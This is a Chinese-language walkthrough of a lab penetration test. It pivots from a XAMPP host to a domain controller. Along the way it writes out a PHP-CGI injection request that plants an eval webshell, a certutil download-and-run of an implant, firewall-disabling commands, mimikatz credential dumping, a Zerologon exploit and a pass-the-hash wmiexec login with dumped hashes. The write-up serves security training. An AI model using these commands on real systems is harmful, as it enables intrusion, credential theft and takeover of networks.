小迪vpc1_wp_2.0-Redbag

首先拿到一个Ip：10.10.0.11
先扫个端口搜集信息，我用的是naabu
“ naabu -host 10.10.0.11 -p 1-65535

用fscan扫一下试试
“ fscan -h 10.10.0.11
扫描结果如下

发现一个xampp，百度

那就利用这个php cgi远程代码执行漏洞试试
构造数据包，看看phpinfo
“`
POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 10.10.0.11
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

<?php phpinfo();?>
“`
随便抓个包放到重放器然后发送上面的数据包

右键，show response in browser，复制url到bp的浏览器打开

在phpinfo中找到网站路径

接着构造数据包写马子到网站路径，数据包如下
“`
POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 10.10.0.11
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

<?php file_put_contents(‘C:\xampp\htdocs\redred.php’, ‘<?php eval($_POST[“pass”]);?>’);?>
“`
写了蚁剑一句话，然后用蚁剑连接
http://10.10.0.11/redred.php
密码pass

连接成功，在服务器启动cs服务器，本地启动cs客户端
“ ./teamserver xxx.xxx.xx.xxx admin123

新增http监听器，生成http反向连接木马，用蚁剑上传到靶机，蚁剑虚拟终端执行木马让靶机上线

靶机成功上线

修改回连间隔为1s
查看ip，关闭防火墙
“`
shell ipconfig
shell netsh advfirewall set allprofiles state off
“`

发现是双网卡，有10段和192段，对192段做一个端口扫描

同时关注目标视图

发现几个web
192.168.2.33:80
192.168.2.22:80
192.168.2.3:80
为了访问到192段，需要搭隧道，将机器上线vshell，然后使用vshell自带的代理功能。
服务器起vshell

启用监听器

在蚁剑命令执行上线

为上线的机器新增内网隧道

本地使用proxifier连接隧道

访问192段，直接可以命令执行

思路就是用命令先关闭防火墙，在已拿下的靶机上上传正向木马，然后使用windows的下载器下载木马，再执行上线
用vshell生成正向木马，上传到xampp网站根目录

命令执行
“`
netsh advfirewall set allprofiles state off
certutil.exe -urlcache -split -f http://192.168.2.3:80/4488.exe C:/4488.exe
C:/4488.exe
“`

正向连接

内网机器成功上线，192.168.2.33（无双网卡）拿下，192.168.2.22同手法

192.168.2.22执行ipconfig，发现双网卡

上传fscan，对.3网段进行信息搜集
“ fscan.exe -h 192.168.3.1/24 -np

“ fscan -h 192.168.3.34 -p 7001

搭隧道，使用weblogic漏洞工具进行利用

存在漏洞

注入内存马

URL: http://192.168.3.34:7001/bea_wls_internal/applicationSingletonProvider   密码：hackfun1024  秘钥：key 

关防火墙，传正向马

复制绝对路径然后执行，

发现10网段
上传mimikatz尝试读一下密码

“ mimikatz.x64.exe “sekurlsa::logonpasswords full” exit > passwords.txt

读到明文密码Admin12345

传个fscan扫一下.10段
“ fscan -h 192.168.10.1/24

使用已知明文凭据尝试连接192.168.10.12和192.168.10.10，需要再在10.88上搭一个隧道
“`
python wmiexec.py administrator:Admin12345@192.168.10.12 -codec gbk
“`

“`
python wmiexec.py xiaodi\administrator:Admin12345@192.168.10.10 -codec gbk
“`
连接不上域控，尝试zerologon直接打域控
修改host
192.168.10.10 DC
192.168.10.10 DC.xiaodi.org

“`
python CVE-2020-1472_Exploit.py dc 192.168.10.10
python secretsdump.py dc$@192.168.10.10 -just-dc -no-pass
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3939097eb9e6da2d44562b9c2743c72a:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
python wmiexec.py -hashes :3939097eb9e6da2d44562b9c2743c72a xiaodi/administrator@192.168.10.10 -codec gbk
“`

拿下域控权限

如果要上线的话，有个思路是在weblogic上部署含木马的war包，然后还是命令执行下载器进行下载木马，执行上线……在wp第一个版本里有